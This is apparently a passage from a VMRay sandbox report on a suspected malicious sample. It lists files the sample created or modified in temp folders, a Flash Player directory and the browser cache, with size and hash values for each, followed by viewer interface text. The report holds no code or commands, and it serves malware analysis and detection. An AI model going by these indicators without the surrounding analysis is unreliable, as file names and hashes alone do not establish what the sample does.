c:\users\aetadzjz\appdata\local\temp\flab08c.tmp
-
File Properties
Names c:\users\aetadzjz\appdata\local\temp\flab08c.tmp (Created File)
Size 0.31 KB (319 bytes)
Hash Values MD5: 8f44eaade8a98a128f71e04667af8328
SHA1: 36ed9ceced094ab5345b34dc008176132de28716
SHA256: 1a367605ecf4ec581f19dfadb122ca1fdc37b47cd311e1fabd53cb12964254ba
Actions
c:\users\aetadzjz\appdata\local\temp\cabb08f.tmp
-
File Properties
Names c:\users\aetadzjz\appdata\local\temp\cabb08f.tmp (Created File)
Size 0.20 KB (207 bytes)
Hash Values MD5: 497bb917bc24b0023d281c2fc2c236af
SHA1: 1c86d43980e988bfcabf57104b2101024696c184
SHA256: a75138a5451d7dbadddf6e4eb27dd6b3fccaf85b3e2af1af4f476d338a55dc2a
Actions
c:\users\aetadzjz\appdata\local\temp\cabb091.tmp
-
File Properties
Names c:\users\aetadzjz\appdata\local\temp\cabb091.tmp (Created File)
Size 0.01 KB (8 bytes)
Hash Values MD5: 7b5b6c7bf41e6055abd4e74476e08575
SHA1: 5c05d3a68f69258d236f6d9677cc0a42e399e7cc
SHA256: 2392619f397925a165cf31634781d68b006c396611c425f6c67f338356e47f8f
Actions
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin
-
File Properties
Names c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin (Created File)
Size 17.36 KB (17779 bytes)
Hash Values MD5: 734b4714f249866d6af2cd47b0929a3d
SHA1: 323502054d5c3e5294e62377d1626ed6261a4673
SHA256: c36c81a8858e6c68f06d494aa33406ce0c407d672b802f431d273877e507e05f
Actions
c:\users\aetadzjz\appdata\local\temp\sofb0d5.tmp
-
File Properties
Names c:\users\aetadzjz\appdata\local\temp\sofb0d5.tmp (Created File)
Size 1.05 KB (1072 bytes)
Hash Values MD5: aac3de092af58ca64dab1cc4b2186c5e
SHA1: 084512759ab2be3358f3bd1c3c4ef2f88871d01f
SHA256: 12ee0606b5290d5d363395ffc82a87b3ac1257cbab1a4a5179eeaafac1638bf6
Actions
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin
-
File Properties
Names c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin (Created File)
Size 18.96 KB (19413 bytes)
Hash Values MD5: e485ce36ccb80721109792301f591596
SHA1: 61e99372d88b5d6412a3e465316e9622c3ff25d4
SHA256: 68a132e520254be9c0f568603076331efc9b54e89f2eafc538a0397faaee5f06
Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\qrq[1].txt
-
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\qrq[1].txt (Created File)
Size 391.61 KB (401004 bytes)
Hash Values MD5: f6e12d2f070ce6a5936fbed778034d4e
SHA1: 23f94e36ddf66ba3e25236ecc83d63fefea9dd77
SHA256: 1716764c1a99963323a4aa287ff8afe97385d4006ae778882ce7597336fa78b0
Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\ymg[1].txt
-
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\ymg[1].txt (Created File)
Size 487.84 KB (499544 bytes)
Hash Values MD5: 3e7b96a26127f8bbe978d5ec0ab2183c
SHA1: 707584fae1eee0b149da3e3d4c520b510ec6128b
SHA256: 8153879cf65226d01cfbc3962edde75fcd3da186adb1d73c3be1b5908517fd26
Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\auniq[1].txt
-
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\auniq[1].txt (Created File)
Size 20.77 KB (21272 bytes)
Hash Values MD5: dc4ceb44d8bb1310e487d691de717647
SHA1: 6fb5662a14a79f7908b673bce6f5f44cb02b6cf1
SHA256: 8f648992dce9dc56dfab5cfadfa7aafd1c1329c2f2f47411fc941effe765a48d
Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\a[1].txt
-
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\a[1].txt (Created File)
Size 36.40 KB (37272 bytes)
Hash Values MD5: 3ecca40e5dc9f0107f5d9ae500177878
SHA1: 947876a5a40257ba6da4021ad4bc8b5317dbdd03
SHA256: 5947ddcc53d38842b7e5bf1aaab70822f2982fe1859183304c2ebd3e5d2f72f0
Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat
-
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat (Modified File)
Size 48.00 KB (49152 bytes)
Hash Values MD5: 9f1ab0535bfe55d2abb1f6e6adf846bd
SHA1: 50f06d017905b347a5155f877fcf966db327dd40
SHA256: 7978882c50b68ce6e541aa765a7a98907cc56c4f1dd794a92766b2f23df85c73
Actions
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\index.dat
-
File Properties
Names c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\index.dat (Modified File)
Size 32.00 KB (32768 bytes)
Hash Values MD5: 50d06047bd7adf336c6a8dd390506ff3
SHA1: ba8e1f4ec8f6aa576cf4f9b2a48587bec03b9582
SHA256: c657149342b5c59c25e0b42daeade7362989c99571979f788342e6bae0c8048e
Actions
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image